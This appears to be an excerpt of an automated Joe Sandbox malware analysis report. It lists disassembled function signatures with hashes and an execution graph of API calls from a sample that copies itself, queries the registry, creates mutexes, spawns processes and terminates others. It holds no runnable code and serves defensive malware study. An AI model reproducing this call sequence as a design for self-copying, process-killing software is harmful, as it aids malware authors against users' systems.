                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: D
                • API String ID: 2102423945-2746444292
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: 970bc3cab4dce72d0a0b33b61279b7f932412b1f80fce55e7bdbb914439b5922
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: 4AE14971D00219ABCF24DBA0CD99FEEBBB8FF04704F144179EA09A6590EB74AA45CF54
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: $$$(
                • API String ID: 2102423945-3551151888
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: 22e42661cfda286e9b7d3bd47f08f654212cea1798b9467055b1a46e3d748421
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: 9691CF71C0021CAAEF21EFA4CC5ABEEBBB5AF06304F144169D505772C1DBB65A48CF65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: ca83e78feab5da7a7ba233646b7c1c66caf954a759dadf56575d77bfb852c8e9
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: 34210B32204308AAEB129EB49C49BFA739DDF44751F900169EB08C6990FB70ED408A94
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: 2db33e54d77467a60d78fb69f3810e60153a7857b6262d1ecd7a6eece6255d23
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: 5EF0E578694790A5F7217B50BC267857D927F31B08F104449D5142E2E1D7FD234C6799
                APIs
                • std::exception::exception.LIBCMT ref: 023DFBF1
                  • Part of subcall function 023C169C: std::exception::_Copy_str.LIBCMT ref: 023C16B5
                • __CxxThrowException@8.LIBCMT ref: 023DFC06
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                • String ID: TeM$TeM
                • API String ID: 3662862379-3870166017
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: 8464d8cb2f355bac22d0e32a296e3c493d3fab4f6868c1a865f9288df40ad3ed
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: 05D06775C0420CBBCB00EFA5D459CDDBBB9AA04344F108466AD5897241EA74A7499F94
                APIs
                  • Part of subcall function 023B197D: __wfsopen.LIBCMT ref: 023B1988
                • _fgetws.LIBCMT ref: 0239D15C
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __wfsopen_fgetws
                • String ID:
                • API String ID: 853134316-0
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: 389a1f854516e34f79cc501e5621b3470a142d2b3fff7fe5f406319eb0b92f3b
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: BA91D172D1031DABCF21EFA4CD867AEB7B5BF06304F140129E959A3640E775EA04CBA5
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID:
                • API String ID: 1783060780-0
                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction ID: 55b228dcbef83f90dedb5de055ccdee627fc22346a060b4a32f9076839ac9698
                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction Fuzzy Hash: FCA151B1C0025CDBEF21EFE4C85ABDEBB76AF15304F140128E50576291D7BA5A48CFA6
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction ID: 7f472099c050a77844ee30f65163e2b78e968ef0c2b65cccfb90509c8a52bdbe
                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction Fuzzy Hash: D951A270A003099BDB2BCF7988846EFB7B6AF40325F148729EE3596ED0DB749951CB40
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 8d8e7f19bddb312c0107f5ef43e69aaef5e26744b192c22f9c3d4d9d57f28313
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: A101487344018ABBCF265E84EC01CEE3F67BB19354B488415FA9D59930D336C5B2AB81
                APIs
                • ___BuildCatchObject.LIBCMT ref: 02457A4B
                  • Part of subcall function 02458140: ___BuildCatchObjectHelper.LIBCMT ref: 02458172
                  • Part of subcall function 02458140: ___AdjustPointer.LIBCMT ref: 02458189
                • _UnwindNestedFrames.LIBCMT ref: 02457A62
                • ___FrameUnwindToState.LIBCMT ref: 02457A74
                • CallCatchBlock.LIBCMT ref: 02457A98
                Memory Dump Source
                • Source File: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2390000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: 51034a92048bb8c2c4c4d15bb0098a0f81a73d1d7a9c34895f1bce2abe1c7f88
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 6F011B32000119BBDF12AF55CC00EDB7BAAEF48754F15802AFD5865222D732E9A1DF90

                Execution Graph

                Execution Coverage:5.2%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:4%
                Total number of Nodes:1956
                Total number of Limit Nodes:177
                execution_graph 42458 41bae0 42459 41bba0 42458->42459 42460 41bb13 42458->42460 42461 41bf3d 42459->42461 42462 41bbad 42459->42462 42463 41bb15 42460->42463 42464 41bb54 42460->42464 42470 41bf65 IsWindow 42461->42470 42471 41bf9a DefWindowProcW 42461->42471 42466 41bbb0 DefWindowProcW 42462->42466 42467 41bbd7 42462->42467 42468 41bb47 PostQuitMessage 42463->42468 42469 41bb1c 42463->42469 42465 41bb70 42464->42465 42472 41bb75 DefWindowProcW 42464->42472 42534 420c62 42467->42534 42468->42465 42469->42465 42469->42466 42476 41bb2e 42469->42476 42470->42465 42474 41bf73 DestroyWindow 42470->42474 42474->42465 42476->42465 42497 411cd0 42476->42497 42478 41bc26 42558 41ce80 59 API calls _memmove 42478->42558 42480 41bb3f 42480->42470 42483 41bc3a 42559 420bed 58 API calls 2 library calls 42483->42559 42484 41befb IsWindow 42485 41bf11 42484->42485 42486 41bf28 42484->42486 42485->42486 42487 41bf1a DestroyWindow 42485->42487 42486->42465 42487->42486 42488 41bef7 42488->42484 42488->42486 42489 414690 59 API calls 42494 41bcdc 42489->42494 42494->42484 42494->42488 42494->42489 42496 41be8f CreateThread 42494->42496 42560 40eff0 65 API calls 42494->42560 42561 41c330 42494->42561 42567 41c240 42494->42567 42573 41b8b0 42494->42573 42595 41ce80 59 API calls _memmove 42494->42595 42496->42494 42596 42f7c0 42497->42596 42500 411d20 _memset 42501 411d40 RegQueryValueExW RegCloseKey 42500->42501 42502 411d8f 42501->42502 42598 415c10 42502->42598 42504 411dbf 42505 411dd1 lstrlenA 42504->42505 42506 411e7c 42504->42506 42611 413520 42505->42611 42508 411e94 6 API calls 42506->42508 42509 411e89 42506->42509 42510 411ef5 UuidCreate UuidToStringW 42508->42510 42509->42508 42512 411f36 42510->42512 42511 411e3c PathFileExistsW 42511->42506 42513 411e52 42511->42513 42512->42512 42514 415c10 59 API calls 42512->42514 42518 411e6a 42513->42518 42614 414690 42513->42614 42516 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 42514->42516 42515 411df1 42515->42511 42519 411f98 42516->42519 42521 411fce 42516->42521 42518->42480 42520 415c10 59 API calls 42519->42520 42520->42521 42522 415c10 59 API calls 42521->42522 42523 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 42522->42523 42524 4121d1 42523->42524 42525 41207c _memset 42523->42525 42524->42518 42526 412095 6 API calls 42525->42526 42527 412115 _memset 42526->42527 42528 412109 42526->42528 42530 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 42527->42530 42637 413260 42528->42637 42531 4121b2 42530->42531 42532 4121aa GetLastError 42530->42532 42533 4121c0 WaitForSingleObject 42531->42533 42532->42524 42533->42524 42533->42533 42535 420cdd 42534->42535 42540 420c6e 42534->42540 42679 42793d DecodePointer 42535->42679 42537 420ce3 42538 425208 __setmbcp 57 API calls 42537->42538 42542 41bbe9 GetComputerNameW 42538->42542 42541 420ca1 RtlAllocateHeap 42540->42541 42543 420c79 42540->42543 42545 420cc9 42540->42545 42549 420cc7 42540->42549 42675 42793d DecodePointer 42540->42675 42541->42540 42541->42542 42551 413100 42542->42551 42543->42540 42672 427f51 58 API calls 2 library calls 42543->42672 42673 427fae 58 API calls 7 library calls 42543->42673 42674 427b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 42543->42674 42676 425208 42545->42676 42550 425208 __setmbcp 57 API calls 42549->42550 42550->42542 42552 413121 42551->42552 42553 413133 42551->42553 42554 415c10 59 API calls 42552->42554 42556 415c10 59 API calls 42553->42556 42555 41312c 42554->42555 42555->42478 42557 413159 42556->42557 42557->42478 42558->42483 42559->42494 42560->42494 42716 41d3c0 42561->42716 42564 41c35b 42564->42494 42727 41d340 42567->42727 42570 41c26b 42570->42494 42574 41b8d6 42573->42574 42577 41b8e0 42573->42577 42575 414690 59 API calls 42574->42575 42575->42577 42576 41b916 42579 41b930 42576->42579 42580 414690 59 API calls 42576->42580 42577->42576 42578 414690 59 API calls 42577->42578 42578->42576 42581 41b94a 42579->42581 42582 414690 59 API calls 42579->42582 42580->42579 42583 41b964 42581->42583 42584 414690 59 API calls 42581->42584 42582->42581 42741 41bfd0 42583->42741 42584->42583 42586 41b976 42587 41bfd0 59 API calls 42586->42587 42588 41b988 42587->42588 42589 41bfd0 59 API calls 42588->42589 42590 41b99a 42589->42590 42591 414690 59 API calls 42590->42591 42593 41b9b4 42590->42593 42591->42593 42592 41b9f2 42592->42494 42593->42592 42753 413ff0 42593->42753 42595->42494 42597 411cf2 RegOpenKeyExW 42596->42597 42597->42500 42597->42518 42599 415c66 42598->42599 42606 415c1e 42598->42606 42600 415c76 42599->42600 42601 415cff 42599->42601 42602 415c88 ___crtGetEnvironmentStringsW 42600->42602 42644 416950 42600->42644 42653 44f23e 59 API calls 2 library calls 42601->42653 42602->42504 42606->42599 42609 414690 59 API calls 42606->42609 42609->42599 42612 414690 59 API calls 42611->42612 42613 413550 42612->42613 42613->42515 42615 4146a9 42614->42615 42616 41478c 42614->42616 42618 4146b6 42615->42618 42619 4146e9 42615->42619 42669 44f26c 59 API calls 3 library calls 42616->42669 42620 414796 42618->42620 42621 4146c2 42618->42621 42622 4147a0 42619->42622 42623 4146f5 42619->42623 42670 44f26c 59 API calls 3 library calls 42620->42670 42668 413340 59 API calls _memmove 42621->42668 42671 44f23e 59 API calls 2 library calls 42622->42671 42626 414707 ___crtGetEnvironmentStringsW 42623->42626 42628 416950 59 API calls 42623->42628 42626->42518 42628->42626 42633 4146e0 42633->42518 42638 41326f 42637->42638 42640 41327d 42637->42640 42639 415c10 59 API calls 42638->42639 42641 413278 42639->42641 42640->42640 42642 415c10 59 API calls 42640->42642 42641->42527 42643 41329c 42642->42643 42643->42527 42645 416986 42644->42645 42646 4169d3 42645->42646 42649 416a0d ___crtGetEnvironmentStringsW 42645->42649 42654 423b4c 42645->42654 42646->42649 42664 44f1bb 59 API calls 3 library calls 42646->42664 42649->42602 42656 423b54 42654->42656 42655 420c62 _malloc 58 API calls 42655->42656 42656->42655 42657 423b6e 42656->42657 42659 423b72 std::exception::exception 42656->42659 42665 42793d DecodePointer 42656->42665 42657->42646 42666 430eca RaiseException 42659->42666 42661 423b9c 42667 430d91 58 API calls _free 42661->42667 42663 423bae 42663->42646 42665->42656 42666->42661 42667->42663 42668->42633 42669->42620 42670->42622 42672->42543 42673->42543 42675->42540 42680 42501f GetLastError 42676->42680 42678 42520d 42678->42549 42679->42537 42694 432534 42680->42694 42682 425034 42683 425082 SetLastError 42682->42683 42697 428c96 42682->42697 42683->42678 42687 42505b 42688 425061 42687->42688 42689 425079 42687->42689 42704 42508e 58 API calls 4 library calls 42688->42704 42705 420bed 58 API calls 2 library calls 42689->42705 42692 42507f 42692->42683 42693 425069 GetCurrentThreadId 42693->42683 42695 432547 42694->42695 42696 43254b TlsGetValue 42694->42696 42695->42682 42696->42682 42698 428c9d 42697->42698 42700 425047 42698->42700 42702 428cbb 42698->42702 42706 43b813 42698->42706 42700->42683 42703 432553 TlsSetValue 42700->42703 42702->42698 42702->42700 42714 4329c9 Sleep 42702->42714 42703->42687 42704->42693 42705->42692 42707 43b81e 42706->42707 42709 43b839 42706->42709 42708 43b82a 42707->42708 42707->42709 42710 425208 __setmbcp 57 API calls 42708->42710 42711 43b849 HeapAlloc 42709->42711 42712 43b82f 42709->42712 42715 42793d DecodePointer 42709->42715 42710->42712 42711->42709 42711->42712 42712->42698 42714->42702 42715->42709 42720 41ccc0 42716->42720 42719 44f23e 59 API calls 2 library calls 42721 423b4c 59 API calls 42720->42721 42722 41ccca 42721->42722 42725 41c347 42722->42725 42726 44f1bb 59 API calls 3 library calls 42722->42726 42725->42564 42725->42719 42733 41cc50 42727->42733 42730 41c257 42730->42570 42732 44f23e 59 API calls 2 library calls 42730->42732 42734 423b4c 59 API calls 42733->42734 42735 41cc5d 42734->42735 42736 41cc64 42735->42736 42740 44f1bb 59 API calls 3 library calls 42735->42740 42736->42730 42739 41d740 59 API calls 42736->42739 42739->42730 42742 41c001 42741->42742 42747 41c00a 42741->42747 42743 41c083 42742->42743 42744 41c04c 42742->42744 42742->42747 42746 41c09e 42743->42746 42750 41c0e1 42743->42750 42780 41cf30 42744->42780 42748 41cf30 59 API calls 42746->42748 42747->42586 42751 41c0b2 42748->42751 42788 41c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 42750->42788 42751->42747 42784 41d5b0 42751->42784 42754 4140f2 42753->42754 42755 414009 42753->42755 42792 44f26c 59 API calls 3 library calls 42754->42792 42757 414016 42755->42757 42758 41405d 42755->42758 42759 4140fc 42757->42759 42760 414022 42757->42760 42761 414106 42758->42761 42762 414066 42758->42762 42793 44f26c 59 API calls 3 library calls 42759->42793 42764 414044 42760->42764 42765 41402b 42760->42765 42794 44f23e 59 API calls 2 library calls 42761->42794 42767 414078 ___crtGetEnvironmentStringsW 42762->42767 42791 416760 59 API calls 2 library calls 42762->42791 42790 412e80 59 API calls _memmove 42764->42790 42789 412e80 59 API calls _memmove 42765->42789 42767->42592 42772 41403b 42772->42592 42774 414054 42774->42592 42781 41cf41 42780->42781 42782 41cf5b 42780->42782 42781->42782 42783 414690 59 API calls 42781->42783 42782->42747 42783->42781 42786 41d5e2 42784->42786 42785 41d63e 42785->42747 42786->42785 42787 414690 59 API calls 42786->42787 42787->42786 42788->42751 42789->42772 42790->42774 42791->42767 42792->42759 42793->42761 42795 423f84 42796 423f90 __setmbcp 42795->42796 42832 432603 GetStartupInfoW 42796->42832 42799 423fed 42801 423ff8 42799->42801 43163 42411a 58 API calls 3 library calls 42799->43163 42800 423f95 42834 4278d5 GetProcessHeap 42800->42834 42835 425141 42801->42835 42804 423ffe 42805 424009 __RTC_Initialize 42804->42805 43164 42411a 58 API calls 3 library calls 42804->43164 42856 428754 42805->42856 42808 424018 42809 424024 GetCommandLineW 42808->42809 43165 42411a 58 API calls 3 library calls 42808->43165 42875 43235f GetEnvironmentStringsW 42809->42875 42812 424023 42812->42809 42815 42403e 42818 424049 42815->42818 43166 427c2e 58 API calls 3 library calls 42815->43166 42885 4321a1 42818->42885 42820 42405a 42899 427c68 42820->42899 42823 424062 42824 42406d __wwincmdln 42823->42824 43168 427c2e 58 API calls 3 library calls 42823->43168 42905 419f90 42824->42905 42827 424081 42828 424090 42827->42828 43169 427f3d 58 API calls _doexit 42827->43169 43170 427c59 58 API calls _doexit 42828->43170 42831 424095 __setmbcp 42833 432619 42832->42833 42833->42800 42834->42799 43171 427d6c 36 API calls 2 library calls 42835->43171 42837 425146 43172 428c48 InitializeCriticalSectionAndSpinCount __mtinitlocknum 42837->43172 42839 42514b 42840 42514f 42839->42840 43174 4324f7 TlsAlloc 42839->43174 43173 4251b7 61 API calls 2 library calls 42840->43173 42843 425154 42843->42804 42844 425161 42844->42840 42845 42516c 42844->42845 42846 428c96 __calloc_crt 58 API calls 42845->42846 42847 425179 42846->42847 42848 4251ae 42847->42848 43175 432553 TlsSetValue 42847->43175 43177 4251b7 61 API calls 2 library calls 42848->43177 42851 42518d 42851->42848 42853 425193 42851->42853 42852 4251b3 42852->42804 43176 42508e 58 API calls 4 library calls 42853->43176 42855 42519b GetCurrentThreadId 42855->42804 42857 428760 __setmbcp 42856->42857 43178 428af7 42857->43178 42859 428767 42860 428c96 __calloc_crt 58 API calls 42859->42860 42861 428778 42860->42861 42862 4287e3 GetStartupInfoW 42861->42862 42863 428783 @_EH4_CallFilterFunc@8 __setmbcp 42861->42863 42869 4287f8 42862->42869 42872 428927 42862->42872 42863->42808 42864 4289ef 43187 4289ff LeaveCriticalSection _doexit 42864->43187 42866 428c96 __calloc_crt 58 API calls 42866->42869 42867 428974 GetStdHandle 42867->42872 42868 428987 GetFileType 42868->42872 42869->42866 42871 428846 42869->42871 42869->42872 42870 42887a GetFileType 42870->42871 42871->42870 42871->42872 43185 43263e InitializeCriticalSectionAndSpinCount 42871->43185 42872->42864 42872->42867 42872->42868 43186 43263e InitializeCriticalSectionAndSpinCount 42872->43186 42876 432370 42875->42876 42877 424034 42875->42877 43220 428cde 58 API calls 2 library calls 42876->43220 42881 431f64 GetModuleFileNameW 42877->42881 42879 4323ac FreeEnvironmentStringsW 42879->42877 42880 432396 ___crtGetEnvironmentStringsW 42880->42879 42883 431f98 _wparse_cmdline 42881->42883 42882 431fd8 _wparse_cmdline 42882->42815 42883->42882 43221 428cde 58 API calls 2 library calls 42883->43221 42886 4321ba _GetLocaleNameFromDefault 42885->42886 42890 42404f 42885->42890 42887 428c96 __calloc_crt 58 API calls 42886->42887 42895 4321e3 _GetLocaleNameFromDefault 42887->42895 42888 43223a 43223 420bed 58 API calls 2 library calls 42888->43223 42890->42820 43167 427c2e 58 API calls 3 library calls 42890->43167 42891 428c96 __calloc_crt 58 API calls 42891->42895 42892 43225f 43224 420bed 58 API calls 2 library calls 42892->43224 42895->42888 42895->42890 42895->42891 42895->42892 42896 432276 42895->42896 43222 42962f 58 API calls 2 library calls 42895->43222 43225 4242fd 8 API calls 2 library calls 42896->43225 42898 432282 42901 427c74 __IsNonwritableInCurrentImage 42899->42901 43226 43aeb5 42901->43226 42902 427c92 __initterm_e 42904 427cb1 __cinit __IsNonwritableInCurrentImage 42902->42904 43229 4219ac 67 API calls __cinit 42902->43229 42904->42823 42906 419fa0 __write_nolock 42905->42906 43230 40cf10 42906->43230 42908 419fb0 42909 419fc4 GetCurrentProcess GetLastError SetPriorityClass 42908->42909 42910 419fb4 42908->42910 42912 419fe4 GetLastError 42909->42912 42913 419fe6 42909->42913 43524 4124e0 109 API calls _memset 42910->43524 42912->42913 42914 41d3c0 59 API calls 42913->42914 42916 41a00a 42914->42916 42915 419fb9 42915->42827 42917 41a022 42916->42917 42918 41b669 42916->42918 42921 41d340 59 API calls 42917->42921 43534 44f23e 59 API calls 2 library calls 42918->43534 42920 41b673 43535 44f23e 59 API calls 2 library calls 42920->43535 42923 41a04d 42921->42923 42923->42920 42925 41a065 42923->42925 43244 413a90 42925->43244 42929 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 42930 41a33d GlobalFree 42929->42930 42945 41a196 42929->42945 42931 41a354 42930->42931 42932 41a45c 42930->42932 42934 412220 76 API calls 42931->42934 43263 412220 42932->43263 42933 41a100 42933->42929 42936 41a359 42934->42936 42938 41a466 42936->42938 43278 40ef50 42936->43278 42937 41a1cc lstrcmpW lstrcmpW 42937->42945 42938->42827 42940 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 42940->42945 42941 41a48f 42944 41a4ef 42941->42944 43283 413ea0 42941->43283 42943 420235 60 API calls _TranslateName 42943->42945 42946 411cd0 92 API calls 42944->42946 42945->42930 42945->42937 42945->42940 42945->42943 42947 41a361 42945->42947 42949 41a563 42946->42949 43260 423c92 42947->43260 42952 41a57e 42949->42952 42960 41a5f5 42949->42960 42951 41a395 OpenProcess 42953 41a402 42951->42953 42954 41a3a9 WaitForSingleObject CloseHandle 42951->42954 42956 414690 59 API calls 42952->42956 42957 411cd0 92 API calls 42953->42957 42954->42953 42959 41a3cb 42954->42959 42955 41a6f9 43531 411a10 8 API calls 42955->43531 42962 41a5a9 42956->42962 42964 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 42957->42964 42975 41a3e2 GlobalFree 42959->42975 42976 41a3d4 Sleep 42959->42976 43525 411ab0 PeekMessageW 42959->43525 42960->42955 42961 41a6fe 42960->42961 42979 41a5db 42960->42979 42965 41a8b6 CreateMutexA 42961->42965 42966 41a70f 42961->42966 42963 414690 59 API calls 42962->42963 42968 41a5d4 42963->42968 42969 41a451 42964->42969 42971 41a8ca 42965->42971 42970 41a7dc 42966->42970 42980 40ef50 58 API calls 42966->42980 43530 40d240 141 API calls 4 library calls 42968->43530 42969->42827 42977 40ef50 58 API calls 42970->42977 42974 40ef50 58 API calls 42971->42974 42972 41a624 GetVersion 42972->42955 42978 41a632 lstrcpyW lstrcatW lstrcatW 42972->42978 42987 41a8da 42974->42987 42981 41a3f7 42975->42981 42976->42951 42982 41a7ec 42977->42982 42983 41a674 _memset 42978->42983 42979->42960 42979->42965 42979->42972 42990 41a72f 42980->42990 42981->42827 42984 41a7f1 lstrlenA 42982->42984 42986 41a6b4 ShellExecuteExW 42983->42986 42985 420c62 _malloc 58 API calls 42984->42985 42988 41a810 _memset 42985->42988 42986->42961 42989 41a6e3 42986->42989 42987->42987 42991 413ea0 59 API calls 42987->42991 43004 41a92f 42987->43004 42992 41a81e MultiByteToWideChar lstrcatW 42988->42992 43006 41a9d1 42989->43006 42990->42990 42993 413ea0 59 API calls 42990->42993 42997 41a780 42990->42997 42991->42987 42992->42984 42994 41a847 lstrlenW 42992->42994 42993->42990 42995 41a8a0 CreateMutexA 42994->42995 42996 41a856 42994->42996 42995->42971 43304 40e760 42996->43304 42999 41a792 42997->42999 43000 41a79c CreateThread 42997->43000 43002 413ff0 59 API calls 42999->43002 43000->42970 43003 41a7d0 43000->43003 44816 41dbd0 95 API calls 4 library calls 43000->44816 43001 41a860 CreateThread WaitForSingleObject 43001->42995 44745 41e690 43001->44745 43002->43000 43003->42970 43005 415c10 59 API calls 43004->43005 43007 41a98c 43005->43007 43006->42827 43315 412840 43007->43315 43009 41a997 43320 410fc0 CryptAcquireContextW 43009->43320 43011 41a9ab 43012 41a9c2 lstrlenA 43011->43012 43012->43006 43013 41a9d8 43012->43013 43014 415c10 59 API calls 43013->43014 43015 41aa23 43014->43015 43016 412840 60 API calls 43015->43016 43017 41aa2e lstrcpyA 43016->43017 43019 41aa4b 43017->43019 43020 415c10 59 API calls 43019->43020 43021 41aa90 43020->43021 43022 40ef50 58 API calls 43021->43022 43023 41aaa0 43022->43023 43024 413ea0 59 API calls 43023->43024 43025 41aaf5 43023->43025 43024->43023 43026 413ff0 59 API calls 43025->43026 43027 41ab1d 43026->43027 43343 412900 43027->43343 43029 40ef50 58 API calls 43031 41abc5 43029->43031 43030 41ab28 _memmove 43030->43029 43032 413ea0 59 API calls 43031->43032 43033 41ac1e 43031->43033 43032->43031 43034 413ff0 59 API calls 43033->43034 43035 41ac46 43034->43035 43036 412900 60 API calls 43035->43036 43038 41ac51 _memmove 43036->43038 43037 40ef50 58 API calls 43039 41acee 43037->43039 43038->43037 43040 413ea0 59 API calls 43039->43040 43041 41ad43 43039->43041 43040->43039 43042 413ff0 59 API calls 43041->43042 43043 41ad6b 43042->43043 43044 412900 60 API calls 43043->43044 43045 41ad76 _memmove 43044->43045 43046 415c10 59 API calls 43045->43046 43047 41ae2a 43046->43047 43348 413580 43047->43348 43049 41ae3c 43050 415c10 59 API calls 43049->43050 43051 41ae76 43050->43051 43052 413580 59 API calls 43051->43052 43053 41ae82 43052->43053 43054 415c10 59 API calls 43053->43054 43055 41aebc 43054->43055 43056 413580 59 API calls 43055->43056 43057 41aec8 43056->43057 43058 415c10 59 API calls 43057->43058 43059 41af02 43058->43059 43060 413580 59 API calls 43059->43060 43061 41af0e 43060->43061 43062 415c10 59 API calls 43061->43062 43063 41af48 43062->43063 43064 413580 59 API calls 43063->43064 43065 41af54 43064->43065 43066 415c10 59 API calls 43065->43066 43067 41af8e 43066->43067 43068 413580 59 API calls 43067->43068 43069 41af9a 43068->43069 43070 415c10 59 API calls 43069->43070 43071 41afd4 43070->43071 43072 413580 59 API calls 43071->43072 43073 41afe0 43072->43073 43074 413100 59 API calls 43073->43074 43075 41b001 43074->43075 43076 413580 59 API calls 43075->43076 43077 41b025 43076->43077 43078 413100 59 API calls 43077->43078 43079 41b03c 43078->43079 43080 413580 59 API calls 43079->43080 43081 41b059 43080->43081 43082 413100 59 API calls 43081->43082 43083 41b070 43082->43083 43084 413580 59 API calls 43083->43084 43085 41b07c 43084->43085 43086 413100 59 API calls 43085->43086 43087 41b093 43086->43087 43088 413580 59 API calls 43087->43088 43089 41b09f 43088->43089 43090 413100 59 API calls 43089->43090 43091 41b0b6 43090->43091 43092 413580 59 API calls 43091->43092 43093 41b0c2 43092->43093 43094 413100 59 API calls 43093->43094 43095 41b0d9 43094->43095 43096 413580 59 API calls 43095->43096 43097 41b0e5 43096->43097 43098 413100 59 API calls 43097->43098 43099 41b0fc 43098->43099 43100 413580 59 API calls 43099->43100 43101 41b108 43100->43101 43103 41b130 43101->43103 43532 41cdd0 59 API calls 43101->43532 43104 40ef50 58 API calls 43103->43104 43105 41b16e 43104->43105 43107 41b1a5 GetUserNameW 